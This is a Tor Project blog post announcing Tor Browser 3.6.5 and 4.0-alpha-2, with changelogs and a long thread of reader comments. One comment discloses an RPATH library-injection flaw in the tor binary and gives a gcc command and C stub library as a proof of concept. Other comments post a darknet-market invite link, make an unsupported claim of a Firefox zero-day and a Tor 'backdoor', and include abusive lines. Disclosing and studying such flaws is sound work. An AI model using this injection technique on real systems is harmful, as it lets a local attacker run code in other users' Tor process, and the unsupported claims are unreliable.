Tor Browser 3.6.5 and 4.0-alpha-2 are released

by mikeperry | September 3, 2014

Tor Browser 3.6.5

The fifth pointfix release of the 3.6 series is available from the Tor Browser Project page and also from our distribution directory.

This release features important security updates to Firefox.

This release also features improvements to the canvas image extraction permissions prompt, and will now log offending script urls to the browser console. It also restores the missing RELRO hardening option to the Linux bundles, and disables NTLM and Negotiate HTTP auth (which can leak sensitive information about the computer). To avoid resolution fingerprinting, popups are also opened in new tabs by default.

Here is the complete changelog for 3.6.5:

  • All Platforms
    • Update Firefox to 24.8.0esr
    • Update NoScript to 2.6.8.39
    • Update HTTPS Everywhere to 4.0.0
    • Update Torbutton to 1.6.12.1
      • Bug 12684: New strings for canvas image extraction message
      • Bug 8940: Move RecommendedTBBVersions file to www.torproject.org
      • Bug 9531: Workaround to avoid rare hangs during New Identity
    • Bug 12684: Improve Canvas image extraction permissions prompt
    • Bug 7265: Only prompt for first party canvas access. Log all scripts
      that attempt to extract canvas images to Browser console.
    • Bug 12974: Disable NTLM and Negotiate HTTP Auth
    • Bug 2874: Remove Components.* from content access (regression)
    • Bug 9881: Open popups in new tabs by default
  • Linux:
    • Bug 12103: Adding RELRO hardening back to browser binaries.

Tor Browser 4.0-alpha-2

In addition, we are also releasing the second alpha in the 4.0 series, available for download on the extended downloads page.

This release also includes important security updates to Firefox.

In addition to including the changes in 3.6.5, this release also is the first Tor Browser release to enable the in-browser Firefox-based updater. This means that if all goes well, 4.0-alpha-2 users will notified of an available update via a notification similar to that in Firefox. You will then be able to download and install it directly via the browser UI. By default, neither the download nor the update will happen automatically, so if you are not feeling adventurous, you need not allow it to update in this way. Even if you are feeling adventurous, you should probably back up your Tor Browser directory before updating.

In addition to the updater, this release should also re-enable the basic hardening features on Windows, including ASLR, DEP, and SSP.

Furthermore, the NoScript behavior in this release has changed. Selecting "Temporarily allow scripts" will now automatically allow all scripts in a page. This was done for usability reasons, to make it easier for novice users to run Tor Browser with scripting disabled most of the time. This will also hopefully make it possible for more people to use the "High Security" setting in our upcoming Security Slider, which will have Javascript disabled globally via NoScript by default.

Here is the complete changelog for 4.0-alpha-2:

  • All Platforms
    • Update Firefox to 24.8.0esr
    • Update NoScript to 2.6.8.39
    • Update Tor Launcher to 0.2.7.0
      • Bug 11405: Remove firewall prompt from wizard.
      • Bug 12895: Mention @riseup.net as a valid bridge request email address
      • Bug 12444: Provide feedback when “Copy Tor Log” is clicked.
      • Bug 11199: Improve error messages if Tor exits unexpectedly
    • Update Torbutton to 1.6.12.1
      • Bug 12684: New strings for canvas image extraction message
      • Bug 8940: Move RecommendedTBBVersions file to www.torproject.org
    • Bug 12684: Improve Canvas image extraction permissions prompt
    • Bug 7265: Only prompt for first party canvas access. Log all scripts
      that attempt to extract canvas images to Browser console.
    • Bug 12974: Disable NTLM and Negotiate HTTP Auth
    • Bug 2874: Remove Components.* from content access (regression)
    • Bug 4234: Automatic Update support (off by default)
    • Bug 9881: Open popups in new tabs by default
    • Meek Pluggable Transport:
      • Bug 12766: Use TLSv1.0 in meek-http-helper to blend in with Firefox 24
  • Windows:
    • Bug 10065: Enable DEP, ASLR, and SSP hardening options
  • Linux:
    • Bug 12103: Adding RELRO hardening back to browser binaries.

The list of frequently encountered known issues is also available in our bug tracker.

Comments

Please note that the comment area below has been archived.

Anonymous (not verified) said:

September 03, 2014

Permalink

Is automatic update secure from man-in-the-middle or perform some kind of hash or GPG signature verification?

Anonymous (not verified) said:

September 03, 2014

Permalink

This new Tor Browser Bundle is ignoring the ExcludeNodes and ExcludeExitNodes settings that I have put in torrc. Why is it doing this? Have you changed the syntax to exclude nodes or is something else going on here?

Anonymous (not verified) said:

September 03, 2014

Permalink

The alpha 64-bit version is giving the out of date browser warning. Should that just be ignored?

Anonymous (not verified) said:

September 03, 2014

Permalink

In terms of matching Mozilla's release cycle, CONGRATS to the team!!

Now when I see Firefox updates and look through the list of security vulnerabilities patched, there isn't a period of time before TBB gets updated that I'm nervous about using TBB as my primary browser.

This makes a difference for TBB users' safety--thanks!

Anonymous (not verified) said:

September 03, 2014

Permalink

Thanks so much for your selfless dedication,Tor is working very well in china now.

Anonymous (not verified) said:

September 03, 2014

Permalink

Since it was just profiled in Wired yesterday, here's an invite link to the Agora Dark Market:

http://pastebin.com/4Kat4twA

Almighty Perry™ & Almighty Dingledine™, keep this post up and I will donate $10 in bitcoins. Oh yeah, keep up the excellent work. :^)

Anonymous (not verified) said:

September 04, 2014

Permalink

To complement the new upgrade functionality, was thinking how nice it could be to have a changelog summarizing features added and new features listed automatically after upgrades occured.Since this information gets always listed on blogs and in git would you be willing to allow volunteers to build this functionality?

Anonymous (not verified) said:

September 04, 2014

Permalink

Currently https://check.torproject.org/RecommendedTBBVersions gives

  1. <br />
  2. [<br />
  3. "3.6.5-Linux",<br />
  4. "3.6.5-MacOS",<br />
  5. "3.6.5-Windows",<br />
  6. "4.0-alpha-2-Linux",<br />
  7. "4.0-alpha-2-MacOS",<br />
  8. "4.0-alpha-2-Windows"<br />
  9. ]<br />

but https://www.torproject.org/projects/torbrowser/RecommendedTBBVersions gives
  1. <br />
  2. [<br />
  3. "3.6.5-Linux",<br />
  4. "3.6.5-MacOS",<br />
  5. "3.6.5-Windows",<br />
  6. "4.0-alpha-2",<br />
  7. "4.0-alpha-2-Linux",<br />
  8. "4.0-alpha-2-MacOS",<br />
  9. "4.0-alpha-2-Windows"<br />
  10. ]<br />

Anonymous (not verified) said:

September 04, 2014

Permalink

It sais I should download a new version of TBB, but the download page only gives me 3.6.4, which results in a 404. 3.6.5. is downloadable, but only if you change the url...

Anonymous (not verified) said:

September 04, 2014

Permalink

On the download page, there is still the TBB version 3.6.4 available. Please fix that. I do not want to download an old version, I want the new one! By the way, such errors are a little bit embarrassing for such advanced developers like you.

Anonymous (not verified) said:

September 04, 2014

Permalink

What the hey is Tor doing on start-up?

1) In the first few minutes, it hogs 50% of CPU. At the same time, Firefox 32 coasts by on only 5% CPU with ten tabs open. Tor Browser only has one tab open, namely about:tor. Why so CPU-hungry?

2) In the first minutes, hundreds and hundreds of kilobytes are being UPloaded by Tor Browser, apparently to "entry guards". Vastly more uploading than downloading. Why is this happening?

3) I am right now downloading the TBB 3.6.5. Apparently, this download comes not from torproject.org but from a site called toastworld.org. (According to the network monitoring function in my Task Manager.) Who or what is toastworld and why is Tor Browser downloading from it?

I have only ever downloaded TBB from torproject.org, never from a third party site. Every time a new version is issued, I delete the entire Tor Browser folder and create a new one.

My computer is running Windows 7 SP1, with all updates installed as they come out. Standard firewall settings. Anti-virus is Microsoft Security Essentials, I also run EMET 5.0. Never had a virus on this machine, scan of the computer comes up clean.

I connect to the Web using a HUAWEI UMTS modem (E3531).

Does not sound like he has been 'owned' to me, since I got this behavior on a totally clean and fresh Windows 8 when I was looking at what TOR was sending out.

It is more TOR thrashing on first boot like any obfuscation program does.

I am the owner of toastworld.org
Toastworld.org is a Tor-node like thousand others. I have no idea what you did, but it looks like you are downloading TBB via Tor through my server.

Anonymous (not verified) said:

September 04, 2014

Permalink

Correction to my previous post: the connection to toastworld.org was not yet the actual download but instead happened after I clicked on "Download Tor Browser Bundle Update..." in the drop-down menu from the blinking onion icon. (No page was loaded.)

Anonymous (not verified) said:

September 04, 2014

Permalink

What about disabling rc4 to force the browser to use stronger ciphers by default ? Jake has warned repeatedly that rc4 is broken . Has there been any discussion on this

I know it could make users more susceptible to fingerprinting but if it can be broken in real time it is no protection anyway. Also some sites may only allow rc4 still so maybe a fallback mode could be implemented to re-enable rc4 on a site if all other ciphers are rejected first assuming you can catch the failed cipher negotiation attempts for the stronger ciphers .

I would be interested to hear your thoughts on this

Thank you to all the team. You all are hero's. You are enabling change and saving lives. I can't emphasize this enough! You all rock!

isn't mozilla retiring 1024-bit certs in FF32? not sure about the latest ESR build upon which TBB is based, but please consider trying the cipherfox add-on

I have the same problem, when I ever use tor browser I get blocked by ask.fm with the message (No robots allowed !).

Still looking for a solution.

Anonymous (not verified) said:

September 04, 2014

Permalink

When the "canvas image" popup appears, should we click the "x" in the corner, "not now" option, or "never for this site (recomended)"? Choosing the never option would create a fingerprinting problem, woudln't it? But if we click the x in the corner, does it protect us?
Thanks

Clicking the "x" and "not now" should give you the same result. So both is fine. Why should the "never" option create a fingerprinting possibility? Because there is much less latency involved when using this option than clicking "x" or "not now"?

Anonymous (not verified) said:

September 04, 2014

Permalink

Several months ago i noticed that Tor has a very handy RPATH... implying a vulnerability that affects all TBBs.
$ objdump -x tor | grep RPATH
RPATH /home/ubuntu/install/openssl/lib:/home/ubuntu/install/libevent/lib

It's easy to create a home directory /home/ubuntu readable by all, and use it to inject dynamic linking libraries (shared objects) into the Tor process. Just by recompiling OpenSSL or libevent with some extra code... Then whoever launches an instance of the tor process from the local machine will execute that injected code, without noticing anything.
Funny thing, is that only the Tor software will have the code injected. So that it isn't the same thing as replacing the system's libc.

You made the perfect honeypot. Any other system administrator could have exploited this bug as i did. I wonder what the NSA is able to do against such a toy. Programmed by unskilled monkeys and checked out by the iSEC Partners... the most handicapped tards ever. Thanks.

Without recompiling anything here's a simple demo, just to prevent the TTB from starting.
gcc -shared -fPIC src.c -o /home/ubuntu/install/libevent/lib/libevent-2.0.so.5

  1. <br />
  2. #include "stdio.h"<br />
  3. #include "stdlib.h"<br />
  4. __attribute__ ((constructor)) void noobs()<br />
  5. {<br />
  6.     fprintf(stderr, "Boom! Harmless demo...\n");<br />
  7.     abort();<br />
  8. }<br />
  9. void evhttp_bind_listener(){};<br />
  10. void evhttp_accept_socket_with_handle(){};<br />
  11. void evhttp_uri_set_path(){};<br />
  12. void evhttp_find_header(){};<br />
  13. void evhttp_connection_set_max_body_size(){};<br />
  14. void evhttp_add_server_alias(){};<br />
  15. void evhttp_uri_parse_with_flags(){};<br />
  16. void evhttp_connection_set_max_headers_size(){};<br />
  17. void evhttp_request_new(){};<br />
  18. void evhttp_send_page(){};<br />
  19. void evhttp_connection_get_base(){};<br />
  20. void evhttp_connection_set_retries(){};<br />
  21. void evhttp_connection_free(){};<br />
  22. void evhttp_connection_get_bufferevent(){};<br />
  23. void evhttp_request_get_uri(){};<br />
  24. void evhttp_accept_socket(){};<br />
  25. void evhttp_uri_set_port(){};<br />
  26. void evhttp_make_request(){};<br />
  27. void evhttp_connection_new(){};<br />
  28. void evhttp_parse_headers(){};<br />
  29. void evhttp_connection_connect(){};<br />
  30. void evhttp_uri_get_userinfo(){};<br />
  31. void evhttp_set_cb(){};<br />
  32. void evhttp_connection_get_peer(){};<br />
  33. void evhttp_connection_set_timeout(){};<br />
  34. void evhttp_uri_get_path(){};<br />
  35. void evhttp_request_own(){};<br />
  36. void evhttp_new(){};<br />
  37. void evhttp_start_read(){};<br />
  38. void evhttp_request_free(){};<br />
  39. void evhttp_request_get_connection(){};<br />
  40. void evhttp_uri_get_query(){};<br />
  41. void evhttp_clear_headers(){};<br />
  42. void evhttp_uri_set_host(){};<br />
  43. void evhttp_decode_uri(){};<br />
  44. void evhttp_uri_set_flags(){};<br />
  45. void evhttp_uri_get_port(){};<br />
  46. void evhttp_send_error(){};<br />
  47. void evhttp_uridecode(){};<br />
  48. void evhttp_set_max_headers_size(){};<br />
  49. void evhttp_cancel_request(){};<br />
  50. void evhttp_request_get_input_buffer(){};<br />
  51. void evhttp_bind_socket_with_handle(){};<br />
  52. void evhttp_send_reply(){};<br />
  53. void evhttp_connection_base_new(){};<br />
  54. void evhttp_bound_socket_get_fd(){};<br />
  55. void evhttp_start(){};<br />
  56. void evhttp_uriencode(){};<br />
  57. void evhttp_encode_uri(){};<br />
  58. void evhttp_connection_set_closecb(){};<br />
  59. void evhttp_set_max_body_size(){};<br />
  60. void evhttp_bind_socket(){};<br />
  61. void evhttp_parse_query(){};<br />
  62. void evhttp_remove_server_alias(){};<br />
  63. void evhttp_send_reply_chunk(){};<br />
  64. void evhttp_request_get_output_buffer(){};<br />
  65. void evhttp_send_reply_start(){};<br />
  66. void evhttp_request_is_owned(){};<br />
  67. void evhttp_uri_set_fragment(){};<br />
  68. void evhttp_remove_virtual_host(){};<br />
  69. void evhttp_request_get_response_code(){};<br />
  70. void evhttp_request_get_host(){};<br />
  71. void evhttp_remove_header(){};<br />
  72. void evhttp_uri_get_host(){};<br />
  73. void evhttp_connection_set_local_address(){};<br />
  74. void evhttp_uri_join(){};<br />
  75. void evhttp_uri_set_scheme(){};<br />
  76. void evhttp_response_code(){};<br />
  77. void evhttp_connection_reset(){};<br />
  78. void evhttp_request_get_command(){};<br />
  79. void evhttp_uri_new(){};<br />
  80. void evhttp_uri_parse(){};<br />
  81. void evhttp_request_get_input_headers(){};<br />
  82. void evhttp_set_gencb(){};<br />
  83. void evhttp_request_set_chunked_cb(){};<br />
  84. void evhttp_uri_free(){};<br />
  85. void evhttp_connection_set_base(){};<br />
  86. void evhttp_htmlescape(){};<br />
  87. void evhttp_connection_set_local_port(){};<br />
  88. void evhttp_request_get_output_headers(){};<br />
  89. void evhttp_connection_fail(){};<br />
  90. void evhttp_parse_query_str(){};<br />
  91. void evhttp_del_cb(){};<br />
  92. void evhttp_uri_get_fragment(){};<br />
  93. void evhttp_free(){};<br />
  94. void evhttp_add_virtual_host(){};<br />
  95. void evhttp_send_reply_end(){};<br />
  96. void evhttp_bound_socket_get_listener(){};<br />
  97. void evhttp_set_allowed_methods(){};<br />
  98. void evhttp_uri_set_query(){};<br />
  99. void evhttp_uri_set_userinfo(){};<br />
  100. void evhttp_uri_get_scheme(){};<br />
  101. void evhttp_set_timeout(){};<br />
  102. void evhttp_request_get_evhttp_uri(){};<br />
  103. void evhttp_add_header(){};<br />
  104. void evhttp_parse_firstline(){};<br />
  105. void evhttp_del_accept_socket(){};<br />
  106. void evdns_base_search_ndots_set(){};<br />
  107. void evdns_shutdown(){};<br />
  108. void evdns_server_request_respond(){};<br />
  109. void evdns_close_server_port(){};<br />
  110. void evdns_count_nameservers(){};<br />
  111. void evdns_nameserver_ip_add(){};<br />
  112. void evdns_server_request_add_ptr_reply(){};<br />
  113. void evdns_server_request_add_cname_reply(){};<br />
  114. void evdns_resolve_reverse_ipv6(){};<br />
  115. void evdns_set_log_fn(){};<br />
  116. void evdns_nameserver_add(){};<br />
  117. void evdns_getaddrinfo_cancel(){};<br />
  118. void evdns_set_transaction_id_fn(){};<br />
  119. void evdns_server_request_get_requesting_addr(){};<br />
  120. void evdns_search_add(){};<br />
  121. void evdns_clear_nameservers_and_suspend(){};<br />
  122. void evdns_base_set_option(){};<br />
  123. void evdns_base_clear_nameservers_and_suspend(){};<br />
  124. void evdns_getaddrinfo(){};<br />
  125. void evdns_set_option(){};<br />
  126. void evdns_add_server_port(){};<br />
  127. void evdns_set_random_bytes_fn(){};<br />
  128. void evdns_base_nameserver_add(){};<br />
  129. void evdns_server_request_drop(){};<br />
  130. void evdns_search_clear(){};<br />
  131. void evdns_server_request_add_a_reply(){};<br />
  132. void evdns_base_search_add(){};<br />
  133. void evdns_server_request_set_flags(){};<br />
  134. void evdns_base_resume(){};<br />
  135. void evdns_init(){};<br />
  136. void evdns_server_request_add_aaaa_reply(){};<br />
  137. void evdns_base_new(){};<br />
  138. void evdns_get_global_base(){};<br />
  139. void evdns_cancel_request(){};<br />
  140. void evdns_resolve_ipv4(){};<br />
  141. void evdns_base_resolve_reverse_ipv6(){};<br />
  142. void evdns_resolve_ipv6(){};<br />
  143. void evdns_search_ndots_set(){};<br />
  144. void evdns_base_resolv_conf_parse(){};<br />
  145. void evdns_resolv_conf_parse(){};<br />
  146. void evdns_base_load_hosts(){};<br />
  147. void evdns_base_free(){};<br />
  148. void evdns_err_to_string(){};<br />
  149. void evdns_base_search_clear(){};<br />
  150. void evdns_base_resolve_reverse(){};<br />
  151. void evdns_base_nameserver_sockaddr_add(){};<br />
  152. void evdns_base_resolve_ipv4(){};<br />
  153. void evdns_base_resolve_ipv6(){};<br />
  154. void evdns_add_server_port_with_base(){};<br />
  155. void evdns_base_count_nameservers(){};<br />
  156. void evdns_server_request_add_reply(){};<br />
  157. void evdns_base_nameserver_ip_add(){};<br />
  158. void evutil_set_evdns_getaddrinfo_fn(){};<br />
  159. void evdns_resolve_reverse(){};<br />
  160. void evdns_resume(){};<br />
  161. void event_set_log_callback(){};<br />
  162. void event_deferred_cb_schedule(){};<br />
  163. void event_deferred_cb_queue_init(){};<br />
  164. void event_changelist_add(){};<br />
  165. void event_get_callback_arg(){};<br />
  166. void event_enable_debug_mode(){};<br />
  167. void event_base_add_virtual(){};<br />
  168. void event_changelist_freemem(){};<br />
  169. void event_warnx(){};<br />
  170. void event_config_set_num_cpus_hint(){};<br />
  171. void event_mm_calloc_(){};<br />
  172. void event_new(){};<br />
  173. void event_err(){};<br />
  174. void event_global_setup_locks_(){};<br />
  175. void event_assign(){};<br />
  176. void event_base_get_features(){};<br />
  177. void event_get_base(){};<br />
  178. void event_get_callback(){};<br />
  179. void event_initialized(){};<br />
  180. void event_changelist_remove_all(){};<br />
  181. void event_reinit(){};<br />
  182. void event_config_set_flag(){};<br />
  183. void event_del(){};<br />
  184. void event_base_priority_init(){};<br />
  185. void event_mm_malloc_(){};<br />
  186. void event_active(){};<br />
  187. void event_config_free(){};<br />
  188. void event_mm_realloc_(){};<br />
  189. void event_base_free(){};<br />
  190. void event_get_version(){};<br />
  191. void event_base_gettimeofday_cached(){};<br />
  192. void event_base_set(){};<br />
  193. void event_get_fd(){};<br />
  194. void event_get_supported_methods(){};<br />
  195. void event_dispatch(){};<br />
  196. void event_base_init_common_timeout(){};<br />
  197. void event_changelist_del(){};<br />
  198. void event_base_loopbreak(){};<br />
  199. void event_base_del_virtual(){};<br />
  200. void event_init(){};<br />
  201. void event_errx(){};<br />
  202. void event_base_dispatch(){};<br />
  203. void event_pending(){};<br />
  204. void event_debug_unassign(){};<br />
  205. void event_set_mem_functions(){};<br />
  206. void event_warn(){};<br />
  207. void event_base_dump_events(){};<br />
  208. void event_get_struct_event_size(){};<br />
  209. void event_base_stop_iocp(){};<br />
  210. void event_config_new(){};<br />
  211. void event_base_loop(){};<br />
  212. void event_sock_warn(){};<br />
  213. void event_free(){};<br />
  214. void event_priority_set(){};<br />
  215. void event_get_events(){};<br />
  216. void event_config_require_features(){};<br />
  217. void event_base_once(){};<br />
  218. void event_get_method(){};<br />
  219. void event_set(){};<br />
  220. void event_base_got_break(){};<br />
  221. void event_set_fatal_callback(){};<br />
  222. void event_get_assignment(){};<br />
  223. void event_msgx(){};<br />
  224. void event_loopbreak(){};<br />
  225. void event_config_avoid_method(){};<br />
  226. void event_sock_err(){};<br />
  227. void event_global_current_base_(){};<br />
  228. void event_active_nolock(){};<br />
  229. void event_deferred_cb_init(){};<br />
  230. void event_loopexit(){};<br />
  231. void event_deferred_cb_cancel(){};<br />
  232. void event_base_got_exit(){};<br />
  233. void event_loop(){};<br />
  234. void event_base_assert_ok(){};<br />
  235. void event_changelist_init(){};<br />
  236. void event_base_new(){};<br />
  237. void event_base_start_iocp(){};<br />
  238. void event_base_new_with_config(){};<br />
  239. void event_once(){};<br />
  240. void event_mm_strdup_(){};<br />
  241. void event_get_version_number(){};<br />
  242. void event_add(){};<br />
  243. void event_priority_init(){};<br />
  244. void event_base_loopexit(){};<br />
  245. void event_base_get_method(){};<br />
  246. void event_debug_map_HT_GROW(){};<br />
  247. void event_base_get_deferred_cb_queue(){};<br />
  248. void event_debug_map_HT_CLEAR(){};<br />
  249. void event_mm_free_(){};<br />

Anonymous (not verified) said:

September 05, 2014

Permalink

Thats likely the reason why it was posted in the end.

For the record I got to know that Firefox has at least a yet to be "publicly discovered" exploit that allows remote code execution through javascript. I don't know which OS is affected nor whether DEP+ASLR are able to mitigate said exploit (who knows, perhaps they can). However the Tor Browser is yet to keep javascript off by default. I believe that Tor Project's refusal to start the browser with javascript off is the only bug (but really a backdoor) that the Tor Project has consciously left in Tor.

I noticed this same issue. Start up Vidalia at the same time or soon after TBB starts and it will connect quickly to the TOR instance running.
Wait a few minutes or start it up minutes after TBB starts running and it can take 2 minutes to load.

Anonymous (not verified) said:

September 07, 2014

Permalink

Dear Tor developers,

recently I read an interview with a Tor dev on BBC's website in which he says that sometimes some NSA employees leak bugs to developers. The interview can be found here:
http://www.bbc.com/news/technology-28886462

I wouldn't trust people who work for intelligence agencies at all. According to a document leaked by Edward Snowden, that's exactly what the NSA wants. Since they cannot break it, they try to "shape" and influence Tor's design, and I couldn't think of a better way to do it:
http://arstechnica.com/security/2013/10/nsa-repeatedly-tries-to-unpeel-…

Maybe they pretend to be privacy-conscious NSA employees and reveal purely theoretical bugs or weaknesses in order to persuade you to change Tor's design in a way that opens the doors to more serious vulnerabilities, that you're obviously not aware of. Please, be careful with these "tips" coming from those NSA's "good samaritans". They aren't good samaritans, otherwise they wouldn't work for the NSA.

Anonymous (not verified) said:

September 07, 2014

Permalink

Okay, I hate to say this but perhaps it is time to put a minimum speed allowed on nodes? There are a TON of nodes showing using Vidalia's Network Map function that have 1KB as the limitation for the node.

This is an obvious attempt at a denial of service attack against TOR and these nodes need to be banned. An example is NotAVirus, frenchfrog, EdwardSnowden41, default, and dalton.

Those 5 have 0KB's as their node limitation and at least 20 in the list above them have 1KB as their node limitation. Maybe it is time to limit running a node to having 300KB's minimum available for the node.

To respond to my earlier post, better than 1/2 of the nodes currently have bandwidth limitations of <10KBps. Yes, K not M. This is obviously a denial of service attack attempt.

Anonymous (not verified) said:

September 07, 2014

Permalink

CloudFlare is showing up more and more resulting in entering 50 captcha challenges a day. Is there anything to prevent this?

what's even more annoying is when you--as a real human just trying to read the news, for example--get served repeated captchas for the same page! after a few tries, i often given up.

cloudflare is messing with people's right to read, and that is vastly uncool.

Some "tricks" to help you deal with too frequent recaptcha requests:

1) Ignore the easy word - you don't need to type it in at all.*

2) On the difficult word, don't worry about the case - it doesn't matter.

3) Typically one character mistake per word is acceptable, so if you can't read everything perfectly, give it your best shot.

4) Use your browser's "Zoom in" button (+) to make the captcha easier to read - it really does help!

* I know that typing in the "easy" word is supposed to help increase the scanning accuracy of actual docs, but forcing me to deal with recaptchas every 5 minutes makes me less sympathetic to that project. Get CloudFlare to scale back their aggressiveness, and I'll go back to entering in both words!

Anonymous (not verified) said:

September 07, 2014

Permalink

Several websites block users of TBB 4.0a2 and TBB 3.6.5 as robots while they work fine with TBB 3.6.4. Addon versions and settings appear to be identical, what else could cause this behavior?

I noticed this as well. It is more common with websites that use CloudFlare (CloudFlare absolutely HATES TOR for some reason and insists 99% of the time that you 'verify that you are a human').

Anonymous (not verified) said:

September 07, 2014

Permalink

A lot of cloudy mystery about cranky CloudFlare?
I have seen this silly sh*t with Torbrowser ONLY.

Anonymous (not verified) said:

September 08, 2014

Permalink

It would be great if Yawning Angel would add obfs4 to Tor Browser 4.0-alpha-2! The updated Firefox ESR on TB 4.0a2 makes me security leery of using TB 4.0a1.

Thanks for your interest in obfs4.

I did rebase my integration branch when switching the build process to use the obfs4proxy-0.0.1 tag (instead of a WIP commit), but the bundle build process hung due to unrelated issues with OSX builds, and since my rebase and tag switch was what I was interested in testing, I haven't retried making another set of snapshots.

I wasn't planning on making new snapshots since I got testing on the aspects I wanted to (build integration, obfs4 UI integration, and basic functionality), and the things holding up deployment are all on the bridge side (specifically, there needs to be more obfs4 bridges).

If there's unexpected substantial delays in deployment later, or I make major code changes I may make snapshots again.

Hope that clarifies things.

Anonymous (not verified) said:

September 08, 2014

Permalink

NOTE AND WARNING:

Could the TOR developer eradicate Google from Mozilla Firefox?!!!

As soon you open TOR and Firefox is running, its conected to the monster of mountain view and they get your IP -- Google service: Google Safe Browsing.

I do know that in order to get CloudFlare to display the captchas (so you can visit the site you want to get to) you need to enable google.com with NoScript (as well as enabling cloudflare.com).

So while Google may be blocked initially, getting TBB to work with CloudFlare forces you to unblock Google. Now I don't know if that compromises your anonymity with TBB - any ideas?

Anonymous (not verified) said:

September 10, 2014

Permalink

I have been seeing this WARNING in the message log a lot recently:

"Rejecting SOCKS request for anonymous connection to private address [scrubbed]"

What does it mean?

Anonymous (not verified) said:

September 11, 2014

Permalink

"All you need to do is disable noscript, httpseverywhere & adblock"

A....... really..... good idea.

Anonymous (not verified) said:

September 11, 2014

Permalink

>Here is the complete changelog for 3.6.5:
>
> All Platforms
> Update Firefox to 24.8.0esr
I have downloaded 3.6.5 tor browser bundle for linux64 but Help->About Tor browser say I have 24.7.0 version

What does it mean?

Anonymous (not verified) said:

September 11, 2014

Permalink

The problem with CloudFlare and other services blocking Tor users is really annoying. Enabling cookies and disabling noscript is no solution, this way I can stop using Tor as well.

Whilst there are now several powerful tools to overcome censorship at ISP level via bridges, I miss options to circumvent the blocking of Tor users on the destination server side.

The question is - what makes us look like robots and what can be done against it?

Not much in the real world. Some people have been using TOR-enabled robot browsers to download stuff that CloudFlare helps host/protect, so it is actually reasonable for CloudFlare to say "Okay, anyone coming from a TOR IP address has to put in a captcha!"

There is publicly available helper file with all tor exit ip in I(brainless)Net. !!You don't even need to use tor to get near real-time status!!
This info can be downloaded and used by website to treat incoming connections differently.
So IF connection comes from TorExitIp THEN treat it as robot.
It's published for "to make live simpler for ..." not as hidden service. I believe, nobody here will help you to hide your tor usage from destination server.
So help yourself and use tor to connect to (anonymous)proxy.

Anonymous (not verified) said:

September 11, 2014

Permalink

Strange interaction with Youtube. No matter which exit node you're on, always goes to the Youtube of Country X (not the exit node you're on), after changing identities several times, repeats several times, then goes to the Youtube of Country Y (not the exit node you're on), repeats . . . persistent after reinstall etc.

Anonymous (not verified) said:

September 12, 2014

Permalink

Hi,
I recently downloaded tor 3.6.5 for windows and Linux and used the successfully. However today, neither will connect to the tor network. However, Orbot on my phone works fine, as well as an older version of tor that I had sitting on a rarely used computer (I don't know the version)
Any ideas?

Anonymous (not verified) said:

September 13, 2014

Permalink

Now tor browser bundle 3.6.5 is running very well in iran,i love you--tor project members so much ,if i am a girl,i will marry one of members!

Anonymous (not verified) said:

September 14, 2014

Permalink

A really hard WTF?

Tried downloading addons ( .xpi ) on https://addons.mozilla.org with Torbrowser ( Iceweasel ).

CRAZY: the Download window has NO entry.
Whats going on ? Whats the error ? Could anybody explain ??
This is strange.

Anonymous (not verified) said:

September 20, 2014

Permalink

Widely observed by many, but to add one more voice, Cloudflare is now an impediment to many, many sites. Major hit to practical functionality of Tor.

Anonymous (not verified) said:

September 22, 2014

Permalink

Please someone find a way to bypass the most annoying shit called CloudFlare. The creators of unreadable captchas should kill themselves